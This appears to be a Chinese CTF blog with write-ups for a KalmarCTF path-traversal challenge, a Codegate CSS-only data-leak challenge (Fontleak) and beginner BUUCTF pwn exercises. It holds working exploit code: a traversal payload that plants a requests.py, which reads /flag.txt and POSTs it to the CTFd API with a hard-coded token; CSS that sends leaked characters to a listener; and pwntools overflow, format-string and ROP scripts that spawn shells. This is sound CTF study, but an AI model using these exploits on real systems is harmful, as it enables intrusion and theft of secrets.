EvilBabyKalmarCTF#

该版本的scraper（d0585767ddfa61920b982398f140f84e1ae2486f）存在漏洞，没有处理异常的路径解析，导致可以进行路径穿越，任意文件写入。由于download.py位于/tmp/download.py，写入/tmp/requests.py可以执行任意代码。

scraper容器不出网，需要从ctfd容器下载requests.py，并且将flag发送至ctfd的通知。审计download.py，发现程序存在bug，需要第一个题目是路径格式正确的，且存在一个附件。

依次创建两个题目，名称、分类任意。id=1的题目需要上传一个正常附件；id=2的题目上传文件到tmp/requests.py，并且在README写入以下Payload：

1
![requests.py](/files/tmp/requests.py#a/../../../../../../../../../../tmp/requests.py)

由于解析漏洞，requests.py将会被写入/tmp/requests.py。

1
import urllib.request
2
import json
3

4
API_TOKEN = "ctfd_a7167b5d2028c1fe411dcc5489ae409e03af0260fd731146b3da672b6833a962"
5

6
with open('/flag.txt', 'r') as f:
7
    flag = f.read().strip()
8

9
data = {
10
    "title": "flag",
11
    "content": flag
12
}
13
json_data = json.dumps(data).encode('utf-8')
14

15
req = urllib.request.Request("http://ctfd:8000/api/v1/notifications", data=json_data, method="POST")
16
req.add_header("Content-Type", "application/json")
17
req.add_header("Authorization", f"Token {API_TOKEN}")
18

19
urllib.request.urlopen(req)

等待约30秒，通知中将会出现MISC部分的flag。

1
kalmar{EvilBabyKalmarCTF-naughty_naughty_little_one,when_did_you_turn_evil?}

sealed_board#

学习到了一种很有意思的XSS技巧，仅通过CSS来泄露任意数据。研究了两天，来分享一下心得。

题目#

Codegate 2026 Quals 出了一道很有意思的 Web 题目：sealed_board。简单介绍场景：

xss 但仅可注入 style 标签
selenium 无头 Firefox（140.0esr）
adminbot 携带 token，页面会出现 #flag 标签

简化一下 adminbot 看到的前端 html：

1
<!doctype html>
2
<html lang="en">
3
  <head>
4
    <meta charset="utf-8">
5
    <meta name="viewport" content="width=device-width, initial-scale=1">
6
    <title>Sealed Board</title>
7
    <link rel="stylesheet" href="/static/css/style.css">
8
  </head>
9
  <body>
10
    <main id="page" class="page">
11
      <article class="hero-card">
12
        <p>"If you want to keep a secret, you must also hide it from yourself."</p>
13
        <p>&mdash; George Orwell, 1984</p>
14
      </article>
15

16
      <div id="flag" data-protected-flag="1">codegate2026{fake_flag}</div>
17

18
    </main>
19
    <script src="/static/js/purify.min.js"></script>
20

21
    <style>
22
        /* 这里可以注入 css 样式 */
23
    </style>
24

25
    <script src="/static/js/app.js"></script>
26

27
  </body>
28
</html>

目标就是泄露 #flag 标签，不过 app.js 还有额外的限制：

1
(function() {
2
    var p = document.getElementById('page');
3
    if (!p) return;
4
    var getProtectedFlag = function() {
5
        for (var i = 0; i < p.children.length; i += 1) {
6
            var node = p.children[i];
7
            if (
8
                node &&
9
                node.id === 'flag' &&
10
                node.getAttribute('data-protected-flag') === '1'
11
            ) {
12
                return node;
13
            }
14
        }
15
        return null;
16
    };
17
    var f = getProtectedFlag();
18
    if (!f) return;
19
    var saved = f.textContent;
20
    f.textContent = '';
21
    f.style.display = 'none';
22
    var check = function() {
23
        f = getProtectedFlag();
24
        if (!f || !f.parentNode) return;
25
        var display = getComputedStyle(f).display;
26
        if (display === 'none') return;
27
        if (display === 'contents') {
28
            f.remove();
29
            return;
30
        }
31
        if (f.checkVisibility()) {
32
            f.remove();
33
            return;
34
        }
35
        if (!f.textContent) f.textContent = saved;
36
    };
37
    setInterval(check, 50);
38
    new MutationObserver(check).observe(p, { childList: true, subtree: true, attributes: true });
39
})();

这段 js 每隔 50ms 就会检查一次。可以看到，如果 display 不等于 none，会执行 f.remove() 从 DOM 中移除 flag。display: contents 同样也会被移除。不过，当内容为空且隐藏时，又会将 saved 放回。

Fontleak#

暂且不考虑上文提到的check机制，如何仅通过css来泄露#flag呢？Google CSS Leak能找到一项名为 Fontleak 的研究：

就像视频里演示的那样，这项技术甚至可以泄露script标签内的数据，而且只需要简单的一行 <style> @import url('/'); </style>。作者在GitHub提供了完整的工具，那么接下来就结合这篇文章和代码来分析一下Fontleak的原理。

Ligatures#

Ligatures 是指连体字。比如一些字体里，>= 会连体成为 ≥，又比如f和i可能会写作连体。

那么Fontleak是如何利用连体来侧信道的呢？其实思路很质朴，通过长度。如果攻击者提供一个特制的字体，控制了任意两个字符连体后那个图形的宽度，那么就可以通过宽度来侧信道泄露数据了。

举个例子，比如我有 CODEGATE，注入css，默认字宽5px，提供一个特殊的连字规则，规定C和A连字的宽度是11px，C和B连字的宽度是12px，C和C连字的宽度是13px … C和O连字的宽度是20px。可以想象，只要我们有一个足够完整的映射表，就能通过整段字符的长度来侧信道泄露每一位字符。

~~我的示意图很曼妙~~

好了你已经能够操控字体了，但是数据怎么外带呢？

Container Query#

CSS并没有提供一个可以测量文本长度的方法，因为可能导致循环触发。不过CSS提供了容器宽度变化后的回调函数。还是以上方例子为例，比方说我现在确定了C和O，文本长度从40px变成了50px，我们提供这段CSS：

1
@container leak (width: 41px) {
2
    head::before {
3
        content: url("http://localhost:4242/leak?data=CA");
4
    }
5
}
6
@container leak (width: 42px) {
7
    head::before {
8
        content: url("http://localhost:4242/leak?data=CB");
9
    }
10
}
11
/* 省略 */
12
@container leak (width: 50px) {
13
    head::before {
14
        content: url("http://localhost:4242/leak?data=CO");
15
    }
16
}
17
/* 这里我们想泄露的是#flag标签 */
18
#flag::before {
19
    margin: 0 !important;
20
    padding: 0 !important;
21
    font-family: 'fontleak' !important;
22
    font-size: 1000px !important;
23
    white-space: pre-line !important;
24
    content: "\100";
25
}

很巧妙吧？但实际上会更复杂一些，因为我们需要通过 容器长度 - 初始长度 + 偏移量 来推测真实长度对应的字符，所以并不会是直接写41px、42px这样。不过这都好解决，因为提供什么CSS完全由我们控制。

其实到这里为止，本题就已经能够解了。下面是Fontleak的优化措施。

能够优化吗？#

Chrome 会动态加载@import，先完成加载的外部CSS会立即应用，后加载的外部CSS会随加载完成覆盖应用。也就是说，可以通过精准控制外部CSS提供的延迟，逐步控制字体连字的行为。当前一次连字完成的同时，再次请求下一段特制的字体，这次包含已知前缀，比如CO+A、CO+B、CO+C、CO+D，让字体去碰撞连接，并且回传长度。以此循环，可以动态且快速地泄露数据。

感觉不太好解释，举个例子吧。最开始的@import会包含以下内容：

1
<script>
2
    /* 这个请求会立刻响应 */
3
    @import url('/?step=0');
4

5
    /* 这个请求会等待第一位字符泄露后响应 */
6
    @import url('/?step=1');
7
</script>

每当接收端收到一位泄露的字符，step就进一位。每次的CSS Payload都会包含下一次的@import载荷，但是会等到前一次泄露完成才提供。

其实这就是 Sequential Import Chaining。非常像是 Chrome 能做出来的性能优化方式，但也只有 Chrome 能够使用。

那么 Firefox 就无解了嘛？其实也不是。有个邪修方法，通过动画：

1
/* 还是假设我们要泄露#flag节点 */
2
#flag::before {
3
    content: "";
4
    /* 这个动画我调过了，实际会通过字符集数量以及每一次leak的时长来动态计算动画周期 */
5
    animation: fontCycle 3.0s steps(1) infinite 0s;
6
}
7

8
@keyframes fontCycle {
9

10
    0.0% {
11
        content: "\100";
12
    }
13

14
    1.0% {
15
        content: "\101";
16
    }
17

18
    2.0% {
19
        content: "\102";
20
    }
21

22
    /* 省略其他字符 */
23

24
    97.0% {
25
        content: "\161";
26
    }
27

28
    98.0% {
29
        content: "\162";
30
    }
31

32
    99.0% {
33
        content: "\163";
34
    }
35

36
}

每一个动画关键帧都去碰撞一位字符，一旦碰撞成功就会立即发生连字，然后外带请求。如果已知字符集，那么关键帧数量就可以大大减少，动画时间也可以略微调小，泄露地就越快。确实相当邪修了。

另外需要注意，Firefox要求所有的@import使用单独的<script>标签。

本题怎么做？#

Fontleak确实是sealed_board的考点，但是出题人真正想考的是他发现的一个Firefox的bug（~~真的呀，我问过他了~~）： content-visibility does not skip background-image loading (unlike display)。

当一个元素不可见时，它就不会被渲染，也就意味着没有数据可以被外带（url不会被请求）。而出题人发现当属性为content-visibility:hidden时，依然尝试加载了外部背景图片。这给外带数据带来了可能。（在这一步卡了很久，动画成功应用了，但无法外带数据）。

另一个需要知道的点是 !important 保留空间的特性。当#page { content-visibility: hidden !important; }时，该元素会隐藏，但依然占据空间，这使得Fontleak的长度测量依然有效。

因此本题的Payload（暂且略过转义）应该是：

1
/* 这里前面有提到，Firefox要求使用单独的script标签 */
2
<style>
3
    @import url('http://localhost:4242/');
4
</style>
5

6
<style>
7
  #flag { display: block !important; }
8
  #page { content-visibility: hidden !important; }
9
</style>

http://localhost:4242/是Fontleak服务的地址，由于原项目的一些bug，只能通过环境变量来设置selector。通过以下命令启动：

1
# 注意这个转义
2
SELECTOR=\#flag PARENT=body BASE_URL=http://localhost:4242 uv run uvicorn fontleak.main:app --host 0.0.0.0 --port 4242

不过你大概还是收不到回传的请求，因为#flag并不是body下的根节点，而Fontleak项目没有考虑到这种情况，需要手动修改模板，在templates/dynamic-anim.css.jinja的*下面加入：

1
body *:has({{ leak_selector }}) {
2
    display: contents !important;
3
}

不能让#flag的父节点page隐藏，否则#flag也将不再可见。

最好再调一下闪烁动画，默认会延迟 1s 执行，但adminbot展示时间有限，改成立即执行，并且略微调快速度：

1
122c127
2
<     animation: fontCycle {{ idx_max * 0.05 }}s steps(1) infinite 1s;
3
---
4
>     animation: fontCycle {{ idx_max * 0.03 }}s steps(1) infinite 0s;

然后就能接到泄露出来的字符了。不过实际测试做不到连续泄露，只能用静态的方式，每次泄露一个字符。（其实偶尔能连续泄露，但动画再快就不稳定了）

完整的 Exploit 放在 GitHub 上，这是 Fontleak 的一个 Fork：链接。打开exploit.py，填入正确的靶机地址以及接收端的地址，然后执行：

1
python exploit.py

exploit

还有别的解法吗？#

有的。如果 50ms 进行一次 check，恰好在检查的那一刻隐藏，然后在不检查的时候显示，并且交换的周期也是 50ms，是不是就可以绕过检测了呢？

1
<style>
2
main#page {
3
    font-size: 0 !important;
4
    padding: 0 !important; margin: 0 !important; border: 0 !important;
5

6
    animation: bypass 50ms infinite !important;
7
}
8
@keyframes bypass {
9
    0%, 49% { content-visibility: hidden; }
10
    50%, 100% { content-visibility: visible;}
11
}
12

13
</style>

这个Payload是真的可以的，我在有头Firefox里测试，#flag最多能存活超过12秒，这完全够用了，但是还是受限于Firefox的机制，闪烁成功概率极低，大概20次可能会出一个字符。据说有人用这个原理解出了，那比赛场景那么多人排队，估计得花相当久吧…

想学一点PWN#

长城杯半决赛被干傻了，AWDP的PWN题一道没做，ISW说是2/3是PWN题。力竭了，最佳配置应该是Web+PWN。虽说专精一个领域是很重要的的，但不管怎么样，多见识一些，总能让自己在面对复杂情景更游刃有余一点。昨天在ai指导下复现了ISW1，感觉还蛮有意思。今天兴致使然，配了一下pwntools。那么开始吧。

test_your_nc#

这题就是nc连上去cat flag，不过既然是pwn菜鸡，趁还简单，熟悉一下ida pro吧。

定位到main，按tab键反编译成C，如下：

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  system("/bin/sh");
4
  return 0;
5
}

所以是直接执行了system函数，并且传入了参数”/bin/sh”。

来看汇编： test_main

ida pro还是很方便的，比如command参数，会把具体值写在注释里。rbp指向当前函数栈帧的基址，rsp是栈顶指针。这个我感觉还蛮好理解的。

1
push    rbp     ; 把栈帧基址推上栈
2
mov     rbp, rsp    ; 把当前的rsp赋值给rbp，这样才真正确定了栈帧在内存的位置

这一段算是初始化环境，应该每个程序都会有吧。

1
lea rdi, command ; "/bin/sh"

lea是Load Effective Address，加载有效地址。就是把字符串作为参数，放到了rdi寄存器里。linux规定，第一个参数必须在rdi寄存器里（Linux x86-64）。

1
call _system

em这就是调用了C标准库的system函数，从rdi取出参数。

1
mov     eax, 0

eax是用来储存返回值的寄存器，把0存入，对应C源码的return 0;

1
pop     rbp
2
retn

弹栈，函数结束了，CPU会去执行rip中的地址。

昨天看了不少入门视频，感觉大体上有些了解了。具体细节目前还一无所知，什么大段序小段序，以及栈的具体结构、组成，都还不清楚。我给自己定了一周的学习目标，希望在2026/03/26～2026/04/04的学习后，能够独立完成基础题目。

rip#

rip是指令指针，存放着CPU要去执行的内存地址。如果能通过某些方式（比如栈溢出，这个感觉门槛会稍低一些）控制了rip，就能完全劫持CPU的执行流程，任意执行shellcode。

直接来看反编译吧，和长城杯那道很像。

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  char s[15]; // [rsp+1h] [rbp-Fh] BYREF
4

5
  puts("please input");
6
  gets(s, argv);
7
  puts(s);
8
  puts("ok,bye!!!");
9
  return 0;
10
}

都说危险的gets，那么危险就在于不检查长度，可以做到可控栈溢出。计算栈溢出的长度很重要。

看到这个char s[15]; // [rsp+1h] [rbp-Fh] BYREF，得知char s[15]位于[rbp-0xF]，也就是从长度为15字节，而rbp本身占8字节，同时返回地址就在rbp上方。

x86/64上，栈是向下增长的，结构大概是：

1
返回地址
2
RBP     （8字节）
3
s[15]   （rbp-0x1）
4
s[14]   （rbp-0x2）
5
...
6
s[1]   （rbp-0xE）
7
s[0]   （rbp-0xF）

所以想要修改返回地址，需要先填充15+8字节，也就是23字节，然后跟上需要跳转到的地址（p64，64位小端序）。题目里给了一个fun函数：

1
int fun()
2
{
3
  return system("/bin/sh");
4
}

只要把返回地址写入这个函数的地址就可以了。ida pro可以很方便的找到他的起点// starts at 401186。这样一来就很清楚了，开始写这个简单的exp吧。

1
from pwn import *
2

3
io = process('./pwn1')
4
#io = remote('node5.buuoj.cn', 29248)
5

6
payload = b'A' * 23 + p64(0x401186)
7
io.sendline(payload)
8
io.interactive()

rip_local 这里不做过多解析，我相信几天后的自己也还是能看懂的。本地通了，结果远程不通？

1
(base) chao@ubuntu:/Users/chao/ctf/BUUCTF/PWN/rip$ python exp.py
2
[+] Opening connection to node5.buuoj.cn on port 29248: Done
3
[*] Switching to interactive mode
4
timeout: the monitored command dumped core
5
[*] Got EOF while reading in interactive

Gemini说，这是64 位系统的栈对齐（Stack Alignment）限制。看不懂思密达。

1
1. 为什么会报错？
2
在 64 位 Linux 环境下（尤其是远程服务器常用的 Ubuntu 18.04 及以上版本），当程序调用 system 函数时，栈顶地址（RSP）必须是 16 字节对齐的（即地址的最后一位十六进制数必须是 0）。
3

4
如果你跳转到 fun 函数时，栈帧恰好没对齐，system 内部的一条指令 movaps 就会触发段错误（Segmentation Fault），导致远程连接直接关闭（EOF）。
5

6
2. 解决方法：多加一个 ret
7
我们需要在 Payload 中增加一个 ret 指令的地址。这相当于在跳转到 fun 之前先执行一个空操作，但这个操作会把栈指针平移 8 字节，从而实现 16 字节对齐。
8

9
步骤如下：
10
- 在 IDA 里的 fun 函数代码附近找一个 ret 指令的地址（或者用 ROPgadget 找）。
11
- 把这个地址插在偏移量和 fun 地址之间。

他给我的exp如下：

1
from pwn import *
2

3
# 建立连接
4
io = remote('node5.buuoj.cn', 29248)
5

6
# 找一个 ret 指令的地址用于对齐栈
7
# 你可以尝试在 IDA 搜索 'ret'，或者直接找 fun 函数结尾的地址
8
ret_addr = 0x401185  # 这里我换成了main函数的retn的地址
9
fun_addr = 0x401186
10

11
# 构造新的 Payload
12
# 偏移 23 字节 + ret 地址 (对齐用) + 目标函数地址
13
payload = b'A' * 23 + p64(ret_addr) + p64(fun_addr)
14

15
io.sendline(payload)
16
io.interactive()

确实通了。诶，我好像有一点懂了，这个ret就和nop指令类似。ret指令会把栈顶弹出，写入rip，rsp+=8，这时候rsp就指向fun的地址了。

warmup_csaw_2016#

1
int sub_40060D()
2
{
3
  return system("cat flag.txt");
4
}
5

6
int __fastcall main(int a1, char **a2, char **a3)
7
{
8
  char s[64]; // [rsp+0h] [rbp-80h] BYREF
9
  _BYTE v5[64]; // [rsp+40h] [rbp-40h] BYREF
10

11
  write(1, "-Warm Up-\n", 0xAu);
12
  write(1, "WOW:", 4u);
13
  sprintf(s, "%p\n", sub_40060D);
14
  write(1, s, 9u);
15
  write(1, ">", 1u);
16
  return gets(v5);
17
}

计算一下offsets：

1
返回地址
2
RBP     8字节
3
v5[64]  64字节
4
s[64]   64字节

64+8=72

1
from pwn import *
2

3
io = process('./warmup_csaw_2016')
4
# io = remote('node5.buuoj.cn', 25922)
5

6
io.sendline(b'A' * 72 + p64(0x40060d))

ok，渐入佳境😂 warmup_csaw_2016_flag

ciscn_2019_n_1#

猜数游戏，示例输入输出：

1
Let's guess the number.
2
56
3
Its value should be 11.28125

不过输入什么都没用。源码不会骗人，来看ida pro怎么说。

1
int func()
2
{
3
  _BYTE v1[44]; // [rsp+0h] [rbp-30h] BYREF
4
  float v2; // [rsp+2Ch] [rbp-4h]
5

6
  v2 = 0.0;
7
  puts("Let's guess the number.");
8
  gets(v1);
9
  if ( v2 == 11.28125 )
10
    return system("cat /flag");
11
  else
12
    return puts("Its value should be 11.28125");
13
}
14

15
int __fastcall main(int argc, const char **argv, const char **envp)
16
{
17
  setvbuf(stdout, 0, 2, 0);
18
  setvbuf(stdin, 0, 2, 0);
19
  func();
20
  return 0;
21
}

所以需要再gets(v1)的时候，溢出到v2的部分，把他的值改成11.28125。

还是画一下栈结构：

1
返回地址
2
RBP         8字节
3
v2          4字节（p32）
4
v1[44]      44字节

那么payload='A'*44 + v2，但是我不知道float在内存中是什么样子的。查到有个IEEE 754标准 IEEE-754

Gemini给了我一段脚本来转换float在内存中的hex，暂时不打算深入研究。

1
import struct
2
# pack('f', ...) 将浮点数转为字节流，'<I' 将其视为小端序整数读取
3
hex_val = hex(struct.unpack('<I', struct.pack('<f', 11.28125))[0])
4
print(hex_val) # 结果是 0x41348000

完整exp如下，从栈溢出入门感觉还是难度适中的。

1
from pwn import *
2

3
# io = process('./ciscn_2019_n_1')
4
io = remote('node5.buuoj.cn', 25384)
5

6
payload = b'A' * 44 + p32(0x41348000)
7

8
io.sendline(payload)

pwn1_sctf_2016#

坏了我本地跑不起来，居然是i386，得装multi-arch的lib了。

1
(base) chao@ubuntu:/Users/chao/ctf/BUUCTF/PWN/pwn1_sctf_2016$ ./pwn1_sctf_2016
2
[qemu-i386]: Could not open '/lib/ld-linux.so.2': No such file or directory

安装i386支持：

1
sudo dpkg --add-architecture i386
2
sudo apt update
3
sudo apt install libc6:i386 libncurses6:i386 libstdc++6:i386

ok，继续做题。

1
int get_flag()
2
{
3
  return system("cat flag.txt");
4
}
5

6
int vuln()
7
{
8
  const char *v0; // eax
9
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
10
  _BYTE v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
11
  _BYTE v4[7]; // [esp+40h] [ebp-18h] BYREF
12
  char v5; // [esp+47h] [ebp-11h] BYREF
13
  _BYTE v6[7]; // [esp+48h] [ebp-10h] BYREF
14
  _BYTE v7[5]; // [esp+4Fh] [ebp-9h] BYREF
15

16
  printf("Tell me something about yourself: ");
17
  fgets(s, 32, _TMC_END__);
18
  std::string::operator=(&input, s);
19
  std::allocator<char>::allocator(&v5);
20
  std::string::string(v4, "you", &v5);
21
  std::allocator<char>::allocator(v7);
22
  std::string::string(v6, "I", v7);
23
  replace((std::string *)v3);
24
  std::string::operator=(&input, v3, v6, v4);
25
  std::string::~string(v3);
26
  std::string::~string(v6);
27
  std::allocator<char>::~allocator(v7);
28
  std::string::~string(v4);
29
  std::allocator<char>::~allocator(&v5);
30
  v0 = (const char *)std::string::c_str((std::string *)&input);
31
  strcpy(s, v0);
32
  return printf("So, %s\n", s);
33
}
34

35
int __cdecl main(int argc, const char **argv, const char **envp)
36
{
37
  vuln();
38
  return 0;
39
}

居然是C++吗。粗略看下来，程序会把I替换为you，也就说输入20个I，就会变成20个you（60字节）。测试下来也确实如此，触发了Segmentation fault pwn1_sctf_2016_Segmentation-fault

好大一坨，~~好恶心~~。不过应该可以选择性忽略那些allocator。get_flag()的地址是0x8048F0D，strcpy(s, v0);会溢出，通过s溢出，把vuln的返回地址改成它应该就可以了。

1
  const char *v0; // eax
2
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
3
  _BYTE v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
4
  _BYTE v4[7]; // [esp+40h] [ebp-18h] BYREF
5
  char v5; // [esp+47h] [ebp-11h] BYREF
6
  _BYTE v6[7]; // [esp+48h] [ebp-10h] BYREF
7
  _BYTE v7[5]; // [esp+4Fh] [ebp-9h] BYREF

还是分析栈结构，（希望是）万变不离其宗。

1
返回地址    ebp+4
2
EBP     4字节（i386）
3
(Padding)   4字节 **这里想了很久，后面细说**
4
v7[5]   5字节
5
v6[7]   7字节
6
v5      1字节
7
v4[7]   7字节
8
v3[4]   4字节
9
s[32]   32字节

所以s到返回地址之间需要填充32+4+7+1+7+5+4=60字节。但是fgets(s, 32, _TMC_END__);是有长度限制的，算上NUL也只有32字节。这里需要用replace来使’I’膨胀为’you’。

构造payload：

1
target_addr = 0x8048F0D
2
payload = b'I' * 20 + p32(target_addr)

不过这个payload还是Segmentation fault了。真没招了，哪看都不对劲，这个char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF为什么是[ebp-3Ch]啊？3Ch=60，算上ebp本身的4字节，那应该是64了。原来又是为了栈对齐。那么这样列出来栈的结构到底有没有用呢，我不知道了，也就是说直接看ida pro给的offset就可以了是吧。

补上padding的4字节：

1
target_addr = 0x8048F0D
2
payload = b'I' * 20 + b'AAAA' + p32(target_addr)

通了，睡觉。

jarvisoj_level0#

1
int callsystem()
2
{
3
  return system("/bin/sh");
4
}
5

6
ssize_t vulnerable_function()
7
{
8
  _BYTE buf[128]; // [rsp+0h] [rbp-80h] BYREF
9

10
  return read(0, buf, 0x200u);
11
}
12

13
int __fastcall main(int argc, const char **argv, const char **envp)
14
{
15
  write(1, "Hello, World\n", 0xDu);
16
  return vulnerable_function(1);
17
}

从buf的read时溢出到callsystem，buf长128字节，rbp是8字节，所以：

1
from pwn import *
2

3
io = process('./level0')
4
payload = b'A' * (128 + 8) + p64(0x400596)
5
io.sendline(payload)
6
io.interactive()

[第五空间2019 决赛]PWN5#

1
int __cdecl main(int a1)
2
{
3
  time_t v1; // eax
4
  int result; // eax
5
  int fd; // [esp+0h] [ebp-84h]
6
  char nptr[16]; // [esp+4h] [ebp-80h] BYREF
7
  char buf[100]; // [esp+14h] [ebp-70h] BYREF
8
  unsigned int v6; // [esp+78h] [ebp-Ch]
9
  int *v7; // [esp+7Ch] [ebp-8h]
10

11
  v7 = &a1;
12
  v6 = __readgsdword(0x14u);
13
  setvbuf(stdout, 0, 2, 0);
14
  v1 = time(0);
15
  srand(v1);
16
  fd = open("/dev/urandom", 0);
17
  read(fd, &dword_804C044, 4u);
18
  printf("your name:");
19
  read(0, buf, 0x63u); // 这里有限制长度
20
  printf("Hello,");
21
  printf(buf);
22
  printf("your passwd:");
23
  read(0, nptr, 0xFu);
24
  if ( atoi(nptr) == dword_804C044 )
25
  {
26
    puts("ok!!");
27
    system("/bin/sh");
28
  }
29
  else
30
  {
31
    puts("fail");
32
  }
33
  result = 0;
34
  if ( __readgsdword(0x14u) != v6 )
35
    sub_80493D0();
36
  return result;
37
}

密码是从/dev/urandom取的，那么就需要read buf的时候溢出到dword_804C044，把它改成已知值。去菜鸟教程查了一下atoi函数：

C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数（类型为 int 型）。

不过read(0, buf, 0x63u);限制了长度，buf有100字节呢。额啊不会做了。Gemini跟我说，当printf(buf);时，输入的%p、%x、 %n，都会被printf当成指令来执行。所以并不是栈溢出去覆盖dword_804C044，而是直接读取dword_804C044的4个字节。

1
$ ./pwn
2
your name:AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p
3
Hello,AAAA-0x40800028-0x63-(nil)-0x40800084-0x3-0x80482ac-0x40800084-0x40835b8c-0x1-0x41414141-0x2d70252d-0x252d7025
4
O�@your passwd:

可以看到，第10个%p打印了0x41414141，也就是AAAA。说明第10个变量刚好就是buf本身。结合exp来看吧

1
from pwn import *
2
io = process('./pwn')
3
target_addr = 0x0804C044
4
payload = p32(target_addr) + b"####%10$s"
5
io.sendline(payload)
6

7
io.recvuntil(b"####")
8
raw_data = io.recv(4)
9
password = u32(raw_data)
10

11
io.sendlineafter(b"your passwd:", str(password).encode())
12
io.interactive()

dword_804C044是全局变量，名字后面的hex就是他的地址。这一部分我理解起来还是有些困难的。printf是线性处理buf的，从buf的第一个字节开始处理。首先读取到0x0804C044这个地址，因为没有%，就会当成普通文本打印。接着遇到了b"####%10$s"，先打印####，遇到%特殊指令。%10$s就是指去读取第10个参数，并且把地址解引用打印出来。而第10个参数刚好就是buf本身数据区域，而开头刚好是指向dword_804C044的地址，于是就去读取0x0804C044存储的值，也就是随机的密码，把它打印出来。为什么会有第几个参数这样的说法呢？因为只传给printf了buf参数啊，正常来说比如printf("%s", str);，后面就跟上了参数，这里没有，就会去栈上读了。

所以payload = p32(target_addr) + b'%p-%p-%p-%p-%p-%p-%p-%p-%p#%s'也是可以的（注意本身不要溢出） flag 另外需要注意，urandom生成的随机数可能会有/x00，这就直接截断了，不过毕竟是小概率事件（但我遇到了，如图），多试几次就行。

jarvisoj_level2#

1
ssize_t vulnerable_function()
2
{
3
  _BYTE buf[136]; // [esp+0h] [ebp-88h] BYREF
4

5
  system("echo Input:");
6
  return read(0, buf, 0x100u);
7
}
8

9
int __cdecl main(int argc, const char **argv, const char **envp)
10
{
11
  vulnerable_function();
12
  system("echo 'Hello World!'");
13
  return 0;
14
}

checksec看一下NX：

1
(ctf) ➜  jarvisoj_level2 checksec level2
2
[*] '/Users/chao/ctf/BUUCTF/PWN/jarvisoj_level2/level2'
3
    Arch:       i386-32-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x8048000)
8
    Stripped:   No

NX开了，那就没法栈溢出塞shellcode。所以需要复用main的system函数。在32位(x86)环境下，函数调用是通过栈来传递参数的。画一下vuln函数的栈结构：

1
返回地址     p32
2
EBP         4字节
3
buf[136]    136字节

offset是140。然后我就不会了，大致思路是找个地方写入/bin/sh，然后让system函数读取它。

1
(base) chao@ubuntu:/Users/chao/ctf/BUUCTF/PWN/jarvisoj_level2$ readelf -S ./level2 | grep .bss
2
  [25] .bss              NOBITS          0804a02c 00102c 000004 00  WA  0   0  1
3

4
(base) chao@ubuntu:/Users/chao/ctf/BUUCTF/PWN/jarvisoj_level2$ ROPgadget --binary ./level2 | grep "pop"
5
0x080482f0 : add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret
6
0x080484aa : add byte ptr [ebx - 0x723603b3], cl ; popal ; cld ; ret
7
0x08048515 : add esp, 0xc ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
8
0x080482f2 : add esp, 8 ; pop ebx ; ret
9
0x08048514 : jecxz 0x8048499 ; les ecx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret
10
0x08048513 : jne 0x80484f8 ; add esp, 0xc ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
11
0x080482f3 : les ecx, ptr [eax] ; pop ebx ; ret
12
0x08048516 : les ecx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret
13
0x08048517 : or al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret
14
0x0804851b : pop ebp ; ret
15
0x08048518 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
16
0x080482f5 : pop ebx ; ret
17
0x0804851a : pop edi ; pop ebp ; ret
18
0x08048519 : pop esi ; pop edi ; pop ebp ; ret
19
0x080484b0 : popal ; cld ; ret
20
0x0804852f : rcr dword ptr [edx], cl ; add byte ptr [eax], al ; add esp, 8 ; pop ebx ; ret

下面是Gemini给的exp，ai确实太厉害了：

1
from pwn import *
2

3
# 设置环境
4
context(os='linux', arch='i386', log_level='debug')
5

6
# 1. 加载二进制文件
7
p = process('./level2')
8
elf = ELF('./level2')
9

10
# 2. 准备地址
11
read_plt = elf.plt['read']
12
system_plt = elf.plt['system']
13
bss_addr = 0x0804a02c  # 你搜到的 .bss 地址
14
pop3ret = 0x08048519   # 你找出的 pop esi; pop edi; pop ebp; ret
15

16
offset = 140
17

18
# 3. 构造 Payload
19
# --- 第一阶段：把 "/bin/sh" 写进 bss ---
20
payload = b'A' * offset
21
payload += p32(read_plt)
22
payload += p32(pop3ret)    # read 执行完跳转到这里清理参数
23
payload += p32(0)          # fd: stdin
24
payload += p32(bss_addr)   # buf: 写入到 bss
25
payload += p32(8)          # size: 8 字节
26

27
# --- 第二阶段：调用 system ---
28
payload += p32(system_plt)
29
payload += p32(0xdeadbeef) # system 的返回地址（不重要）
30
payload += p32(bss_addr)   # system 的参数：刚才写入的 "/bin/sh"
31

32
# 4. 发送 Payload
33
p.sendlineafter(b"Input:", payload)
34

35
# 5. 发送要写入 .bss 的字符串
36
# 注意：这一步是发给程序里的 read 函数的
37
p.send(b"/bin/sh\x00")
38

39
# 6. 拿到 Shell
40
p.interactive()

我现在要把这段exp搞清楚。卧槽这就是rip rop吗，爱了爱了。

1
payload = b'A' * 140 + p32(read_plt) + p32(pop3ret) + p32(0) + p32(bss) + p32(8)

前面有提过，X86的参数必须在栈上，一个干净的栈应该是这样的：

1
- 返回地址
2
- 参数1
3
- 参数2
4
- 参数3
5
...

plt和got不做展开，搜一下就了解了，动态链接相关。这一段payload后，vuln函数的栈会变成：

栈上的位置	内容	角色
ESP (栈顶)	read_plt	CPU 正在这里执行
ESP + 4	pop3ret	返回地址（read 执行完后跳这里）
ESP + 8	0	参数 1 (fd)
ESP + 12	bss_addr	参数 2 (buf)
ESP + 16	8	参数 3 (size)

也就是当read执行完后，会进行pop3ret，把栈上的参数都弹掉，然后retn。而retn等价于pop eip，也就是从esp取出指令存入eip，然后esp向后移动4字节。那么继续向后接上system函数地址及参数。

1
payload += p32(system_plt)
2
payload += p32(0xdeadbeef) # system 的返回地址（不重要）
3
payload += p32(bss_addr)   # system 的参数：刚才写入的 "/bin/sh"

